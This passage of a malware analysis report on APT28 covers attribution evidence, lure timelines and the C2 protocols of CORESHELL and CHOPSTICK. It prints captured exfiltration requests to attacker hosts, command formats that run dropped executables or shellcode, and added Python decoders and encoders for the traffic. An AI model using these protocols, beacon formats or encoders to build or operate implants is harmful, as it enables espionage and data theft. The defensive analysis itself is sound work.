3b0ecd011500f61237c205834db0e13a | 43520 | 2014-02-13 16:29:36 | Applicate | 20
5882fda97fdf78b47081cc4105d44f7c | 45056 | 2014-05-13 15:18:24 | Applicate | 21
791428601ad12b9230b9ace4f2138713 | 45056 | 2014-05-13 16:42:26 | Applicate | Same as previous.
ead4ec18ebce6890d20757bb9f5285b1 | 45056 | 2014-07-25 15:44:04 | Applicate | Same as previous.
48656a93f9ba39410763a2196aabc67f | 112640 | 2014-07-30 11:13:24 | Applicate | 22
8c4fa713c5e2b009114adda758adc445 | 112640 | 2014-07-30 11:13:24 | Applicate | Same as previous.
Notes to Table 4:
17 SOURFACE with minor changes to network communications (see Figure 7).
18 Basic anti-debug measures added (process listing, rand timing, IsDebuggerPresent).
19 Switches from loading a secondary DLL (netui.dll/WinIDS.dll) to uploading the contents of %temp%\chkdbg.log.
20 Statically links msvcrt library.
21 Statically links msvcrt library; the strings used to identify the imported libraries and functions are reversed prior to being used, then reversed back after use.
22 This version added assembly level obfuscation, which slows down analysis. This variant requires the OS to be at least Windows Vista.
Figure 7: Example of modified SOURFACE vs. CORESHELL communications
SOURFACE URL for a sample compiled April 2013:
http://[hostname]/~book/cgi-bin/brvc.cgi?WINXPSP3c95b87a4-05_01
CORESHELL URL for a sample compiled April 2013:
http://[hostname]/~xh/ch.cgi?enhkZm1GNmY1YWg0eGcxMGQ1MDUwMQ==
Figure 8: NATO-themed decoy delivered with possible EVILTOSS predecessor from 2004
Variants of the SOURFACE second stage backdoor, EVILTOSS, share some code similarities with SOURFACE. However, EVILTOSS contains more capabilities, including the ability to provide access to the file system and registry, enumerate network resources, create processes, log keystrokes, access stored credentials, and execute shellcode. The backdoor encrypts data that it uploads with an RSA public key. Many of its variants we have seen are named netui.dll. EVILTOSS variants may use the Simple Mail Transfer Protocol (SMTP) to send stolen data in an attachment named “detaluri.dat”. The backdoor attaches this file to a preformatted email and sends it out through a victim’s mail server.
Interestingly, we found an antivirus report from 2004[23] detailing what appears to be an early variant of EVILTOSS. The backdoor was installed alongside the NATO-themed decoy document depicted in Figure 8. The backdoor sent data via SMTP to [email protected][.]ru and received its tasking via POP from [email protected][.]ru. Although we have not conclusively attributed this sample to APT28, it does suggest the possibility that APT28 has been operating since as early as 2004.[24]
23 http://ae.norton.com/security_response/print_writeup.jsp?docid=2004-081915-1004-99
24 Although the malware family and interest in NATO make it likely that APT28 was involved, we cannot conclusively attribute this sample to APT28 based on these factors alone. We have no evidence that they controlled the C2 for this malware or were using EVILTOSS in 2004. APT28 could have possibly obtained this source code from another group of actors. Also, malware can be passed from group to group. The other malware that we associate with APT28 in this paper is more strongly attributed to the group using additional factors, some of which we mention in Appendix A.
During our research, we discovered that
APT28 uses a backdoor developed using a
modular framework. We call this
backdoor CHOPSTICK, a somewhat ironic name
that comes from our semi-random name
generator. The modular design allows flexible
options for compiling variants with different
capabilities as needed, as well as deploying
additional capabilities at runtime. This allows the
developers to make targeted implants, including
only the capabilities and protocols necessary for a
specific environment. Such a modular framework
suggests the group has had an organized
development effort since as early as 2007. A
formal development environment, in which code is
versioned and well-organized, would almost
certainly be required to track and define the
various modules that can be included in the
backdoor at compile time.
CHOPSTICK variants may move messages and
information using at least three methods:
1. Communications with a C2 server using
HTTP. These protocols are covered in more
detail in Appendix D.
2. Email sent through a specified mail server.
One CHOPSTICK v1 variant contained
modules and functions for collecting
keystroke logs, Microsoft Office documents,
and PGP files. The monitoring for new files of
interest is performed by a “Directory
Observer” module. In one sample this
information was intended to be sent via
SMTP using a Georgian MIA mail server. It
used one of four embedded sender email
addresses (@mia.gov.ge) to send files via
email to another email address on the same
mail server. All information required for the
email was hardcoded in the backdoor.
3. Local copying to defeat closed networks.
One variant of CHOPSTICK focuses on
apparent air gap / closed network capabilities
by routing messages between local
directories, the registry and USB drives.
MODULAR IMPLANTS INDICATE A FORMAL DEVELOPMENT ENVIRONMENT
During our research into APT28’s malware, we noted two details consistent across malware samples. The first was that APT28 had consistently compiled Russian language settings into their malware. The second was that
malware compile times from 2007 to 2014
corresponded to normal business hours in the UTC
+ 4 time zone, which includes major Russian cities
such as Moscow and St. Petersburg.
Use of Russian and English Language Settings in PE Resources
PE resources include language information that
can be helpful if a developer wants to show user
interface items in a specific language.25 Non-default
language settings packaged with PE resources are
dependent on the developer’s build environment.
Each PE resource includes a “locale” identifier with
a language ID “composed of a primary language
identifier indicating the language and a sublanguage
identifier indicating the country/region.”26
At the time of the writing of this paper, we had
identified 103 malware samples that were both
attributed to APT28 and contained PE resources.
Table 5 shows the locale identifiers27 with
associated language and country/region for
these samples.
Table 5: Locale and language identifiers associated with APT28 malware
Locale ID | Primary language | Country/Region | Number of APT28 samples
0x0419 | Russian (ru) | Russia (RU) | 59
0x0409 | English (en) | United States (US) | 27
0x0000 or 0x0800 | Neutral locale / System default locale language | Neutral | 16
0x0809 | English (en) | United Kingdom (GB) | 1
APT28 MALWARE INDICATES RUSSIAN SPEAKERS IN A RUSSIAN TIME ZONE
25 Microsoft Developer Network – Multiple Language Resources, http://msdn.microsoft.com/en-us/library/cc194810.aspx
26, 27 Microsoft Developer Network – Language Identifier Constants and Strings, http://msdn.microsoft.com/en-us/library/dd318693.aspx
The samples with Russian language settings were compiled between late 2007 and late 2013, as depicted in Figure 9. This consistency over a long timeframe suggests that the developers of APT28 malware were using a build environment
Figure 9: Number of APT28 samples with Russian language settings by compile month (chart; year axis begins at 2007)
the time and made no effort to obscure this detail. Overall, the locale IDs suggest that APT28 developers can operate in both Russian and English.
Compile Times Align with Working Hours in Moscow and St. Petersburg
Of the 140 malware samples that we have
attributed to APT28 so far, over 89% were
compiled between 0400 and 1400 UTC time, as
depicted in Figure 10. Over 96% were compiled
between Monday and Friday. This parallels the
working hours in UTC+0400 (that is, compile
times begin about 8AM and end about 6PM in this
time zone). This time zone includes major Russian
cities such as Moscow and St. Petersburg.
Figure 10: Compile times of APT28 malware in UTC time (histogram of sample frequency by hour of day, 0 to 24 UTC, with Moscow business hours marked)
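The two attribution measurements described above (Table 5's locale decomposition and the working-hours analysis of compile times) as an added Python example, not code from the report. The sample rows are constructed for illustration and are not the report's 140-sample data set; the Table 5 locale values and the 04:00-14:00 UTC window are taken from the text.

```python
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Microsoft language identifiers: primary language in the low 10 bits,
# sublanguage in the high 6 bits. Only the values listed in Table 5 are mapped.
PRIMARY_LANGUAGES = {0x00: "Neutral", 0x09: "English", 0x19: "Russian"}
SUBLANGUAGES = {
    (0x00, 0): "Neutral",
    (0x00, 2): "System default",
    (0x09, 1): "United States",
    (0x09, 2): "United Kingdom",
    (0x19, 1): "Russia",
}

# The report's working-hours window: 04:00-14:00 UTC, which is 08:00-18:00
# in the UTC+4 zone that covers Moscow and St. Petersburg.
WINDOW_START_UTC, WINDOW_END_UTC = 4, 14
MOSCOW_OFFSET_HOURS = 4

# Constructed sample metadata (compile time in UTC, PE resource locale ID).
# Illustrative rows only, not the report's data set.
CONSTRUCTED_SAMPLES = [
    ("2007-11-14 06:12:40", 0x0419),
    ("2009-03-03 09:47:02", 0x0419),
    ("2011-06-21 11:30:15", 0x0409),
    ("2012-10-09 13:05:51", 0x0419),
    ("2013-04-16 10:49:25", 0x0000),
    ("2013-08-06 07:53:03", 0x0800),
    ("2014-02-13 16:29:36", 0x0809),  # after 14:00 UTC: outside the window
    ("2014-07-27 15:15:00", 0x0419),  # a Sunday: weekend outlier
]


@dataclass
class Sample:
    compile_time: datetime  # timezone-aware, UTC
    locale_id: int


def load_samples(rows):
    """Turn (timestamp, locale) rows into Sample objects with UTC datetimes."""
    return [
        Sample(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc), lcid)
        for ts, lcid in rows
    ]


def describe_locale(lcid: int) -> str:
    """Split a locale ID into its primary language and sublanguage names."""
    primary = lcid & 0x3FF
    sublang = lcid >> 10
    language = PRIMARY_LANGUAGES.get(primary, f"primary {primary:#x}")
    region = SUBLANGUAGES.get((primary, sublang), f"sublanguage {sublang}")
    return f"{language} / {region}"


def locale_summary(samples) -> Counter:
    """Count samples per decoded locale, the way Table 5 does."""
    return Counter(describe_locale(s.locale_id) for s in samples)


def compile_time_profile(samples, start_utc=WINDOW_START_UTC, end_utc=WINDOW_END_UTC) -> dict:
    """Measure how many compile times fall in a UTC hour window and on weekdays."""
    total = len(samples)
    if total == 0:
        raise ValueError("no samples")
    in_window = sum(1 for s in samples if start_utc <= s.compile_time.hour < end_utc)
    weekdays = sum(1 for s in samples if s.compile_time.weekday() < 5)
    return {
        "total": total,
        "pct_in_window": 100.0 * in_window / total,
        "pct_weekday": 100.0 * weekdays / total,
        "hour_histogram": dict(sorted(Counter(s.compile_time.hour for s in samples).items())),
    }


def window_in_zone(start_utc: int, end_utc: int, offset_hours: int) -> tuple[int, int]:
    """Express a UTC hour window in local clock hours for a fixed UTC offset."""
    return (start_utc + offset_hours) % 24, (end_utc + offset_hours) % 24


def local_hour(sample: Sample, offset_hours: int = MOSCOW_OFFSET_HOURS) -> int:
    """Hour of day of a sample's compile time in the given fixed-offset zone."""
    return sample.compile_time.astimezone(timezone(timedelta(hours=offset_hours))).hour


if __name__ == "__main__":
    samples = load_samples(CONSTRUCTED_SAMPLES)
    print(locale_summary(samples))
    print(compile_time_profile(samples))
    print("UTC window as local hours:",
          window_in_zone(WINDOW_START_UTC, WINDOW_END_UTC, MOSCOW_OFFSET_HOURS))
```

The same functions run unchanged over real compile timestamps and locale IDs extracted from a sample set; the constructed rows only show the shape of the output.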
We started researching APT28 based on activity we observed on our clients’ networks, similar to other targeted threat groups we have identified
over time. We assess that APT28 is most likely
sponsored by the Russian government. We
summarize our key observations about APT28 in
Figure 11 below.
APT28’s characteristics—their targeting, malware,
language, and working hours—have led us to
conclude that we are tracking a focused, long-
standing espionage effort. Given the available
data, we assess that APT28’s work is sponsored
by the Russian government.
CONCLUSION
MALWARE
Evolves and Maintains Tools for Continued, Long-Term Use
• Uses malware with flexible and lasting platforms
• Constantly evolves malware samples for continued use
• Malware is tailored to specific victims’ environments, and
is designed to hamper reverse engineering efforts
• Development in a formal code development environment
Various Data Theft Techniques
• Backdoors using HTTP protocol
• Backdoors using victim mail server
• Local copying to defeat closed/air gapped networks
TARGETING
Georgia and the Caucasus
• Ministry of Internal Affairs
• Ministry of Defense
• Journalist writing on Caucasus issues
• Kavkaz Center
Eastern European Governments & Militaries
• Polish Government
• Hungarian Government
• Ministry of Foreign Affairs in Eastern Europe
• Baltic Host exercises
Security-related Organizations
• NATO
• OSCE
• Defense attaches
• Defense events and exhibitions
RUSSIAN ATTRIBUTES
Russian Language Indicators
• Consistent use of Russian language in malware over a
period of six years
• Lure to journalist writing on Caucasus issues suggests
APT28 understands both Russian and English
Malware Compile Times Correspond to Work Day in Moscow’s
Time Zone
• Consistent among APT28 samples with compile times
from 2007 to 2014
• The compile times align with the standard workday in the
UTC + 4 time zone which includes major Russian cities such
as Moscow and St. Petersburg
Figure 11: Summary of key observations about APT28
APPENDIX A: DISTINGUISHING THREAT GROUPS
We use the term “threat group” to refer to actors
who work together to target and penetrate
networks of interest. These individuals may share
the same set of tasks, coordinate targets, and
share tools and methodology. They work together
to gain access to their targets and steal data.
The art of attributing disparate intrusion activities
to the same threat group is not always simple.
Different groups may use similar intrusion
methodologies and common tools, particularly
those that are widely available on the Internet,
such as pwdump, HTran, or Gh0st RAT. There may
be overlaps between groups caused by the sharing
of malware or exploits they have authored, or
even the sharing of personnel. Individual threat
actors may move between groups either
temporarily or permanently. A threat actor may
also be a private citizen who is hired by multiple
groups. Multiple groups, on occasion, compromise
the same target within the same timeframe.
Distinguishing one threat group from another is
possible with enough information, analytical
experience, and tools to piece it all together. We
can analyze multiple incidents and tell by the
evidence left behind that a given incident was the
result of one threat group and not another.
Threat actors leave behind various forensic
details. They may send spear phishing emails from
a specific IP address or email address. Their emails
may contain certain patterns; files have specific
names, MD5 hashes, timestamps, custom
functions, and encryption algorithms. Their
backdoors may have command and control IP
addresses or domain names embedded. These are
just a few examples of the myriad of forensic
details that we consider when distinguishing one
threat group from another.
At the most basic level, we say that two intrusion
events are attributed to the same group when we
have collected enough indicators to show beyond
a reasonable doubt that the same actor or group
of actors were involved. We track all of the
indicators and significant linkages associated with
identified threat groups in a proprietary database
that comprises millions of nodes and linkages
between them. In this way, we can always go back
and answer “why” we associated cyber threat
activity with a particular group.
APPENDIX B: TIMELINE OF APT28 LURES
YEAR | LURE TOPIC | MALWARE
2010 | Iran’s work with an international organization (internal document) | SOURFACE
2011 | File named “military cooperation.doc” | SOURFACE, OLDBAIT
2011 | Georgian language IT document for Ministry of Internal Affairs (internal document) | SOURFACE
2011 | “USB Disk Security is the best software to block threats that can damage your PC or compromise your personal information via USB storage.” | SOURFACE
2012 | Food security in Africa (“Food and nutrition crisis reaches peak but good forecast for 2013”) | SOURFACE
2012 | “IDF Soldier Killed and another injured in a Terror Attack” | SOURFACE
2012 | “Echo Crisis Report” on Portugal’s forest fires | SOURFACE
2012 | “FBI to monitor Facebook, Twitter, Myspace” | SOURFACE
2012 | Georgia (US state, not the country of Georgia) murder case uncovers terror plot | SOURFACE
2012 | Military attachés in London (internal document) | SOURFACE
2013 | South Africa MFA document | CHOPSTICK, CORESHELL
2013 | John Shalikashvili (Georgian-Polish-American US General) Questionnaire | CORESHELL
2013 | Asia Pacific Economic Cooperation Summit 2013 reporters (internal document) | SOURFACE
2013 | Defense Attachés in Turkey (internal document) | CHOPSTICK, CORESHELL
2013 | Turkish Cypriot news about Syria chemical weapons | CHOPSTICK, CORESHELL
2013 | Georgian language document about drivers’ licenses (internal document) | EVILTOSS
2013 | Apparent Reason Magazine-related lure sent to a journalist | CORESHELL
2014 | Mandarin language document, possibly related to a Chinese aviation group (non-public document) | CORESHELL
2014 | Netherlands-Malaysia cessation of hostilities; related to Ukraine airline attack | CORESHELL
APPENDIX C: SOURFACE/CORESHELL
SOURFACE is a downloader that obtains a second stage backdoor from a C2 server. Over time the downloader has evolved and the newer versions, usually compiled with the DLL name ‘coreshell.dll’, are distinct enough from the older versions that we refer to it as SOURFACE/CORESHELL or simply CORESHELL. This appendix focuses on these newer versions.
CORESHELL uses two threads to communicate with its C2 server. The first thread sends beacons that contain the process listing of the compromised host. The second thread is responsible for downloading and executing stage two payloads. Messages are sent using HTTP
POST requests whose bodies contain encrypted
and Base64 encoded data. The encryption
algorithm is a custom stream cipher using a
six-byte key. Commands from the controller to the
CORESHELL implant are encrypted using another
stream cipher but this time using an eight-byte
key. CORESHELL has used the same user agent
string (“MSIE 8.0”) that SOURFACE previously
used, but in more recent samples CORESHELL
uses the default Internet Explorer user agent
string obtained from the system. Figure 11 shows
an example POST request.
Figure 11: Example CORESHELL POST request
POST /check/ HTTP/1.1
User-Agent: MSIE 8.0
Host: adawareblock.com
Content-Length: 58
Cache-Control: no-cache

zXeuYq+sq2m1a5HcqyC5Zd6yrC2WNYL989WCHse9qO6c7powrOUh5KY=
When Base64 decoded, the POST content looks like this:
00000000  cd 77 ae 62 af ac ab 69 b5 6b 91 dc ab 20 b9 65  .w.b...i.k... .e
00000010  de b2 ac 2d 96 35 82 fd f3 d5 82 1e c7 bd a8 ee  ...-.5..........
00000020  9c ee 9a 30 ac e5 21 e4 a6                       ...0..!..
The key used to encrypt the message is six bytes long and is appended to the end of the message. In this example the key would be: 30 ac e5 21 e4 a6. When the message is decrypted, the resulting plaintext is:
00000000  00 72 68 64 6e 7a 78 64 66 6d 46 36 66 35 61 68  .rhdnzxdfmF6f5ah
00000010  34 78 67 30 34 30 33 30 35 30 31 1a 00 00 00 23  4xg04030501....#
00000020  00 00 00                                         ...
The following table contains a breakdown of each field of the C2 message.
Table 6: Example CORESHELL beacon structure
Offset | Value | Description
00 | 00 | Command byte: 0 - Command request; 1 - Process listing
01 | “rhdn” | Unknown - potentially a campaign identifier. Values seen so far: “rhze”, “rhdn” and “mtfs”.
05 | “zxdfmF6f5ah4xg” | Hostname of compromised system
13 | “0403” | Unknown - potentially a version number. This number is hardcoded within the implant.
17 | “05” | OS major version
19 | “01” | OS minor version
1B | 0x0000001a | Header length minus the command byte (LE DWORD)
1F | 0x00000023 | Length of the entire message (LE DWORD)
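The beacon layout of Table 6 and the CORESHELL check-in URL of Figure 7, worked through as an added Python example (not the implant's code and not from the report). It splits the POST body into ciphertext and the trailing six-byte key, parses an already-decrypted beacon with length validation, and decodes the Base64 URL parameter; the custom stream cipher is not described on the page, so decryption itself is out of scope. The field boundaries assumed for the URL parameter are taken from the beacon layout and are an assumption.

```python
import base64
import struct

# All sample data below is copied from Appendix C of the report (Figure 7,
# Figure 11 and Table 6); none of this is the implant's own code.
POST_BODY_B64 = "zXeuYq+sq2m1a5HcqyC5Zd6yrC2WNYL989WCHse9qO6c7powrOUh5KY="
CHECKIN_URL = "http://[hostname]/~xh/ch.cgi?enhkZm1GNmY1YWg0eGcxMGQ1MDUwMQ=="
DECRYPTED_BEACON = bytes.fromhex(
    "00 72 68 64 6e 7a 78 64 66 6d 46 36 66 35 61 68 "
    "34 78 67 30 34 30 33 30 35 30 31 1a 00 00 00 23 "
    "00 00 00"
)

KEY_LEN = 6            # six-byte stream-cipher key trails the ciphertext
HEADER_LEN = 0x1A      # Table 6: header length excluding the command byte
FIXED_LEN = 0x23       # command byte + header + the two length DWORDs
COMMAND_NAMES = {0: "command request", 1: "process listing"}


def split_beacon_body(body_b64: str) -> tuple[bytes, bytes]:
    """Base64-decode a CORESHELL POST body and peel off the trailing key.

    The report states that the six-byte key is appended to the encrypted
    message, so the last six bytes are the key and the rest is ciphertext.
    The cipher is a custom stream cipher the page does not specify.
    """
    raw = base64.b64decode(body_b64, validate=True)
    if len(raw) <= KEY_LEN:
        raise ValueError("body too short to hold ciphertext plus key")
    return raw[:-KEY_LEN], raw[-KEY_LEN:]


def parse_beacon(plaintext: bytes) -> dict:
    """Parse a decrypted beacon into the fields of Table 6.

    Both length DWORDs are checked against the buffer so that a truncated or
    padded message is rejected instead of being silently misread.
    """
    if len(plaintext) < FIXED_LEN:
        raise ValueError("beacon shorter than its fixed header")
    header_len, total_len = struct.unpack_from("<II", plaintext, 0x1B)
    if header_len != HEADER_LEN:
        raise ValueError(f"unexpected header length {header_len:#x}")
    if total_len != len(plaintext):
        raise ValueError(f"declared length {total_len} != actual {len(plaintext)}")
    command = plaintext[0]
    os_major = plaintext[0x17:0x19].decode("ascii")
    os_minor = plaintext[0x19:0x1B].decode("ascii")
    return {
        "command": COMMAND_NAMES.get(command, f"unknown ({command:#x})"),
        "campaign_id": plaintext[1:5].decode("ascii"),
        "hostname": plaintext[5:0x13].decode("ascii"),
        "version": plaintext[0x13:0x17].decode("ascii"),
        "os_version": f"{int(os_major)}.{int(os_minor)}",
        # A process listing (command 1) would follow the fixed header.
        "payload": plaintext[FIXED_LEN:],
    }


def decode_checkin_url(url: str) -> dict:
    """Decode the Base64 query string of a CORESHELL check-in URL (Figure 7).

    The report says the new URL format encodes hostname, volume serial number
    and OS version. The boundaries used here are an assumption borrowed from
    the beacon layout of Table 6: 14-char hostname, a 4-char field (read here
    as the volume serial), then two 2-char OS version fields.
    """
    query = url.rsplit("?", 1)[1]
    decoded = base64.b64decode(query, validate=True).decode("ascii")
    if len(decoded) != 22:
        raise ValueError(f"unexpected decoded length {len(decoded)}")
    return {
        "hostname": decoded[:14],
        "volume_serial": decoded[14:18],
        "os_version": f"{int(decoded[18:20])}.{int(decoded[20:22])}",
    }


if __name__ == "__main__":
    ciphertext, key = split_beacon_body(POST_BODY_B64)
    print(f"ciphertext {len(ciphertext)} bytes, key {key.hex()}")
    print(parse_beacon(DECRYPTED_BEACON))
    print(decode_checkin_url(CHECKIN_URL))
```

The hostname recovered from the URL parameter matches the one in the decrypted beacon, which is the cross-check an analyst would use to tie a check-in URL and a POST body to the same infected host.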
Commands are sent from the C2 server to the CORESHELL backdoor in HTTP responses to the POST requests. The command is identified by the NULL terminated UNICODE string “OK” (O\x00K\x00\x00\x00). The command is Base64 encoded and immediately follows the “OK” string. Figure 12 shows a sample CORESHELL command:
The Base64 decoded string is:
00000000  01 00 00 00 AA AA 01 01 01 01 01 01 01 01 10 41  ........ .......A
00000010  70 41 10 42 33 42 D3 43 F2 43 92 44 B5 44 55 45  pA.B3B.C .C.D.DUE
00000020  74 45 14 46 37 46 D7                             tE.F7F.
The following table contains a description of each field in the command message:
Figure 12: Example CORESHELL controller response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 58

O.K...AQAAAKqqAQEBAQEBAQEVzPMEUUIzQtND8kOSRLVEVUV0RRRGN0bX
Table 7: CORESHELL C2 message structure
Offset | Value | Description
00 | 0x00000001 | Constant value, must be set to 1 (LE DWORD)
04 | AA AA | Unknown - not referenced
06 | 01 01 01 01 01 01 01 01 | Encryption key (8 bytes)
0E | 10 41 70 41 10 42 33... | Encrypted command
When the above command “10 41 70 41 10 42 33…” is decrypted using the key “01 01 01 01 01 01 01 01” the following command message is produced:
00000000  04 CC C2 04 00 42 42 42 42 43 43 43 43 44 44 44  .....BBBBCCCCDDD
00000010  44 45 45 45 45 46 46 46 46                       DEEEEFFFF
The implant supports the following four command identifiers
from the controller as seen in Table 8. The
first byte of the command message specifies the command type
and is immediately followed by the PE or
shellcode to be executed. In this example the command byte is
04 indicating the following bytes are
shellcode. If the command byte was 01, 02, or 03 the following
bytes would be a DLL or EXE that would
be written to disk and executed.
Table 8: CORESHELL commands
Command ID | Description
01 | Save command data as %LOCALAPPDATA%\svchost.exe and execute using CreateProcess.
02 | Save command data as %LOCALAPPDATA%\conhost.dll and execute using rundll32.exe "%s",#1.
03 | Save command data as %LOCALAPPDATA%\conhost.dll and execute using LoadLibrary.
04 | Command data is shellcode and is executed using CreateThread.
APPENDIX D: CHOPSTICK
CHOPSTICK is a backdoor that uses a modularized, object-oriented framework written in C++. This framework allows for a diverse set of capabilities across malware variants sharing a common code base. CHOPSTICK may communicate with external servers using SMTP or HTTP. This appendix documents variants using HTTP communications.
The first time CHOPSTICK is executed, it may encrypt and store configuration data in the Registry key HKU\S-1-5-19_Classes\Software\Microsoft\MediaPlayer\{E6696105-E63E-4EF1-939E-15DDD83B669A}\chnnl. The user hive HKU\S-1-5-19 corresponds to the LOCAL_SERVICE account SID.
The configuration block is encrypted using RC4 encryption. The key is a combination of a 50-byte static key and a four-byte salt value randomly generated at runtime. The static key is derived from opcodes in the backdoor.
CHOPSTICK collects detailed information from the host
including the Windows version, CPU
architecture, Windows Firewall state, User Account Control
(UAC) configuration settings on Windows
Vista and above and Internet Explorer settings. It also tests for
the installation of specific security
products (Table 9) and applications (Table 10).
Table 9: Endpoint security products detected by CHOPSTICK
Service Name | Security Product
Acssrv | Agnitum Client Security
AVP | Kaspersky
SepMasterService | Symantec
McAfeeService | McAfee
AntiVirService | Avira
Ekrn | ESET
DrWebAVService | Dr. Web Enterprise Security
MBAMService | Malwarebytes Anti-Malware
Table 10: Applications detected by CHOPSTICK
Process Name | Application
firefox.exe | Mozilla Firefox
iexplore.exe | Internet Explorer
outlook.exe | Microsoft Outlook
opera.exe | Opera Browser
bat.exe | Unknown
msimn.exe | Outlook Express
vpngui.exe | Cisco Anyconnect VPN client
ipseca.exe | IPsec VPN client
ipsecc.exe | IPsec VPN client
openvpn.exe | OpenVPN client
openssl.exe | OpenSSL
openvpn-gui-1.0.3.exe | OpenVPN client
msmsgs.exe | Microsoft Messenger
wuauclt.exe | Windows Update
chrome.exe | Google Chrome Browser
thebat.exe | The Bat Secure Email Client
skype.exe | Skype Messenger
After collecting host information, CHOPSTICK creates a hidden file that may be named %ALLUSERSPROFILE%\edg6EF885E2.tmp for temporary storage and creates a Windows mailslot with the name “check_mes_v5555”.[28] Its usage of a Windows mailslot would potentially allow external binaries to write data to the “check_mes_v5555” mailslot, possibly allowing CHOPSTICK to encrypt and store output from other malware. It creates a thread that records user activity on the host: it captures desktop screenshots in JPEG format, tracks current window focus, collects keystrokes, and scrapes window contents (text, context menus, etc.). User activity is captured once every 500 milliseconds and logged in an HTML-like format. The thread writes user activity log messages to the “check_mes_v5555” mailslot in plain text. CHOPSTICK reads messages from the mailslot, encrypts them using RC4, and then stores the encrypted message in an edg6EF885E2.tmp temporary file. The RC4 encryption used here also uses a 50-byte static key plus a four-byte random salt value.
After approximately 60 seconds of execution time, CHOPSTICK
begins communicating with one of its C2
servers over HTTP. After sending an initial HTTP GET request
it uploads the file contents of edg6EF885E2.
tmp to the C2 server using HTTP POST requests. It does not
wait for a response from the server to begin
uploading. Once the contents of edg6EF885E2.tmp are
uploaded, CHOPSTICK deletes the file. Figure 13
below contains an example of an HTTP POST request uploading
a segment from edg6EF885E2.tmp.
Figure 13: Sample CHOPSTICK v2 HTTP POST

POST /search/?btnG=D-3U5vY&utm=79iNI&ai=NPVUnAZf8FneZ2e_qptjzwH1Q&PG3pt=n-B9onK2KCi HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Host: windows-updater.com
Content-Length: 77
Cache-Control: no-cache

1b2x7F4Rsi8_e4N_sYYpu1m7AJcgN6BzDpQYv1P2piFBLBqghXiHY3SIfe8cUHHYojeXfeyyOhw==
[28] A mailslot is a Windows inter-process communication (IPC) mechanism similar to a named pipe, but is designed for one-way communications between processes and can also be used across the network.
CHOPSTICK uses a URL-safe Base64 encoding, whose alphabet replaces “+” and “/” with “-” and “_”, respectively. Each HTTP request contains multiple Base64-encoded URL parameters; however, only one parameter (“ai=”) contains information encoded by the malware, and the rest of the URL parameters appear to be randomly generated per request.

CHOPSTICK encrypts an 11-byte sequence in the “ai=” parameter. The purpose of this parameter appears to be to uniquely identify the particular instance of the backdoor to the C2 server. The Base64-encoded text of this parameter begins with a number of randomly generated alphabetical characters, presumably intended to prevent people from Base64-decoding the whole string without some knowledge of how the malware family works. The first four bytes of the message are an XOR key for the remainder of the data. Once decrypted using the XOR key, an 11-byte sequence is revealed. The first seven bytes are static, and are hard-coded in CHOPSTICK, while the last four bytes appear to be unique.

The message body of the POST request is also Base64 encoded. This encoded string is also prefixed with random characters designed to break the output of a Base64 decode operation on the entire string. The first 15 bytes of the decoded message body comprise another 11-byte sequence similar to the sequence stored in the “ai=” parameter as described above. Decrypting these bytes yields another static seven-byte sequence, followed by four unique bytes. The remainder of the message body consists of the RC4-encrypted data containing the HTML-formatted user activity log, edg6EF885E2.tmp.
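The “ai=” identifier scheme and the matching 15-byte header of the POST body, as an added example (not the report's or the malware's code): the 4-byte XOR key plus the 11-byte identifier is always 15 bytes, which Base64 always encodes as exactly 20 characters, so the random alphabetic prefix of the “ai=” value is whatever precedes its last 20 characters. It assumes the 4-byte key is reused cyclically over the 11 bytes; the static/unique values, XOR key and POST-body prefix length used for the round-trip are constructed.

```python
import base64
import binascii
import random
import string

# Sizes fixed by the report: a 4-byte XOR key followed by an 11-byte identifier
# (7 static bytes, then 4 unique bytes). 15 raw bytes always Base64-encode to
# exactly 20 characters (no padding), so everything before the last 20
# characters of the parameter value is the random alphabetic prefix.
XOR_KEY_LEN = 4
STATIC_LEN = 7
UNIQUE_LEN = 4
RAW_LEN = XOR_KEY_LEN + STATIC_LEN + UNIQUE_LEN   # 15
ENCODED_LEN = 20


def _xor(data: bytes, key: bytes) -> bytes:
    # Assumption: the 4-byte key is reused cyclically over the 11 data bytes.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_identity_block(raw: bytes) -> tuple[bytes, bytes]:
    """Turn a 15-byte block into (static 7 bytes, unique 4 bytes).

    The same layout opens both the "ai=" parameter and the POST body.
    """
    if len(raw) != RAW_LEN:
        raise ValueError(f"expected {RAW_LEN} bytes, got {len(raw)}")
    key, data = raw[:XOR_KEY_LEN], raw[XOR_KEY_LEN:]
    ident = _xor(data, key)
    return ident[:STATIC_LEN], ident[STATIC_LEN:]


def decode_ai_parameter(value: str) -> tuple[bytes, bytes]:
    """Drop the random prefix of an "ai=" value and decode the identifier."""
    if len(value) < ENCODED_LEN:
        raise ValueError("ai= value too short to hold a 15-byte identifier")
    prefix, encoded = value[:-ENCODED_LEN], value[-ENCODED_LEN:]
    if prefix and not prefix.isalpha():
        raise ValueError("prefix is not purely alphabetic; not the v2 ai= layout")
    try:
        raw = base64.urlsafe_b64decode(encoded)
    except binascii.Error as exc:
        raise ValueError(f"bad Base64 in ai= value: {exc}") from exc
    return decode_identity_block(raw)


def split_post_body(body: str, prefix_len: int) -> tuple[bytes, bytes, bytes]:
    """Split a POST body into (static 7, unique 4, RC4-encrypted log blob).

    The body's prefix length is not fixed, so the caller supplies it; the RC4
    blob is returned as-is because decrypting it needs the static key.
    """
    raw = base64.urlsafe_b64decode(body[prefix_len:])
    static, unique = decode_identity_block(raw[:RAW_LEN])
    return static, unique, raw[RAW_LEN:]


def _random_prefix(n: int) -> str:
    return "".join(random.choice(string.ascii_letters) for _ in range(n))


def encode_ai_parameter(static: bytes, unique: bytes, xor_key: bytes,
                        prefix_len: int) -> str:
    """Encoder side, used only to construct test input for the decoder."""
    raw = xor_key + _xor(static + unique, xor_key)
    return _random_prefix(prefix_len) + base64.urlsafe_b64encode(raw).decode()


def encode_post_body(static: bytes, unique: bytes, xor_key: bytes,
                     rc4_blob: bytes, prefix_len: int) -> str:
    """Encoder side for the POST body layout (constructed test input only)."""
    raw = xor_key + _xor(static + unique, xor_key) + rc4_blob
    return _random_prefix(prefix_len) + base64.urlsafe_b64encode(raw).decode()
```

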